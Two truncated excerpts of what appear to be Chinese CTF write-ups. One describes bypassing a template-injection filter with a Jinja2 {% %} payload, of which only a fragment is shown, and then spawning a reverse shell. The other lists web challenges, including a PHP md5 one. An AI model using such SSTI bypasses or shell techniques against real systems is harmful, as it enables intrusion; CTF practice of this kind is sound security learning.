web 星愿信箱 进去是个输入框，fuzz一下，过滤了{{ }}、__import__等字符，在网上找一个{% %}的payload，稍微改改就行，这里无回显，于是弹shell payload： {%set x=().__class__.__base__.__subclasses__()[N].__init__.__globals__ …

打人民CC期间打的一个比赛，web的质量个人感觉挺适合我这种小登的（除了测测你的🐎，卡了蛮久，最后第二次上马出来的时候让我感觉有些脑） *为未解出，赛后复现 WEB 我们一起来下棋吧 藏在源码里 ez_md5 <?php error_reporting(0); highlight_file(__FILE__); $a=$_GET['a…